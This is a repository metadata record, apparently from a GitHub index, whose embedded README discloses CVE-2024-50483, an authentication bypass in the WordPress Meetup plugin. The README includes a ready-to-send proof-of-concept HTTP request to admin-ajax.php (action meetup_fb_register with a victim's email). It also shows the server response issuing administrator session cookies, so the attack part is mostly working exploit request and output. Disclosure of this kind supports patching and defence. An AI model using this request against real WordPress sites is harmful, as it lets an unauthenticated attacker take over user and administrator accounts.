{"id":21125693,"url":"https://github.com/randomrobbiebf/cve-2024-50483","last_synced_at":"2026-01-02T11:59:29.543Z","repository":{"id":261317686,"uuid":"883950955","full_name":"RandomRobbieBF/CVE-2024-50483","owner":"RandomRobbieBF","description":"Meetup \u003c= 0.1 - Authentication Bypass via Account Takeover","archived":false,"fork":false,"pushed_at":"2024-11-05T21:40:58.000Z","size":2,"stargazers_count":2,"open_issues_count":0,"forks_count":0,"subscribers_count":2,"default_branch":"main","last_synced_at":"2025-01-21T05:41:45.576Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":null,"has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/RandomRobbieBF.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2024-11-05T21:38:44.000Z","updated_at":"2024-11-14T10:41:37.000Z","dependencies_parsed_at":"2024-11-05T22:35:20.926Z","dependency_job_id":"6e76cff0-fbc5-4aee-b5db-6b115f2674c0","html_url":"https://github.com/RandomRobbieBF/CVE-2024-50483","commit_stats":null,"previous_names":["randomrobbiebf/cve-2024-50483"],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/RandomRobbieBF%2FCVE-2024-50483","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/RandomRobbieBF%2FCVE-2024-50483/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/RandomRobbieBF%2FCVE-2024-50483/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/RandomRobbieBF%2FCVE-2024-50483/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/RandomRobbieBF","download_url":"https://codeload.github.com/RandomRobbieBF/CVE-2024-50483/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":243573163,"owners_count":20312879,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-11-20T04:36:23.964Z","updated_at":"2026-01-02T11:59:29.501Z","avatar_url":"https://github.com/RandomRobbieBF.png","language":null,"funding_links":[],"categories":[],"sub_categories":[],"readme":"# CVE-2024-50483\nMeetup \u0026lt;= 0.1 - Authentication Bypass via Account Takeover\n\n# Description:\nThe Meetup plugin for WordPress is vulnerable to authentication bypass in all versions up to, and including, 0.1. This is due to the plugin not properly verifying a user's identity prior to authenticating them via the facebook_register() function. This makes it possible for unauthenticated attackers to log in as any user, granted they know their email address.\n\n```\nCVE: CVE-2024-50483\nCVSS: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\nCVSS Score: 9.8\nSlugs: meetup\n```\n\nNote: You need to know the users email address you want to login as.\n\nPOC\n---\n\n```\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: kubernetes.docker.internal\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 149\n\naction=meetup_fb_register\u0026email=admin@admin.com\u0026first_name=Test\u0026last_name=User\u0026id=12345678901234567890\u0026type=token\u0026link=https://example.com/user/test/\n\n```\n\nResponse\n--\n\n```\nHTTP/1.1 200 OK\nDate: Tue, 05 Nov 2024 21:37:23 GMT\nServer: Apache/2.4.57 (Debian)\nX-Powered-By: PHP/8.2.13\nX-Robots-Tag: noindex\nX-Content-Type-Options: nosniff\nExpires: Wed, 11 Jan 1984 05:00:00 GMT\nCache-Control: no-cache, must-revalidate, max-age=0\nReferrer-Policy: strict-origin-when-cross-origin\nX-Frame-Options: SAMEORIGIN\nSet-Cookie: wordpress_e2df32a6c3e7076dd7dc7d3f3fec39aa=admin%7C1732052243%7Cip8EqMGbc9Iect9L7RPRWfDKjucVdkdSKINkRz5VxrM%7Cb30fbbd9ddce680d1b3992fc121335abfede4d30ed0ddfea33cab3c7a9c800dd; expires=Wed, 20 Nov 2024 09:37:23 GMT; Max-Age=1252800; path=/wp-content/plugins; HttpOnly\nSet-Cookie: wordpress_e2df32a6c3e7076dd7dc7d3f3fec39aa=admin%7C1732052243%7Cip8EqMGbc9Iect9L7RPRWfDKjucVdkdSKINkRz5VxrM%7Cb30fbbd9ddce680d1b3992fc121335abfede4d30ed0ddfea33cab3c7a9c800dd; expires=Wed, 20 Nov 2024 09:37:23 GMT; Max-Age=1252800; path=/wp-admin; HttpOnly\nSet-Cookie: wordpress_logged_in_e2df32a6c3e7076dd7dc7d3f3fec39aa=admin%7C1732052243%7Cip8EqMGbc9Iect9L7RPRWfDKjucVdkdSKINkRz5VxrM%7Cecd2fbdf078b2f2b3735b5e423cfae0efa73526e26e17f3cd192896597c7b650; expires=Wed, 20 Nov 2024 09:37:23 GMT; Max-Age=1252800; path=/; HttpOnly\nContent-Length: 0\nContent-Type: text/html; charset=UTF-8\n```\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Frandomrobbiebf%2Fcve-2024-50483","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Frandomrobbiebf%2Fcve-2024-50483","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Frandomrobbiebf%2Fcve-2024-50483/lists"}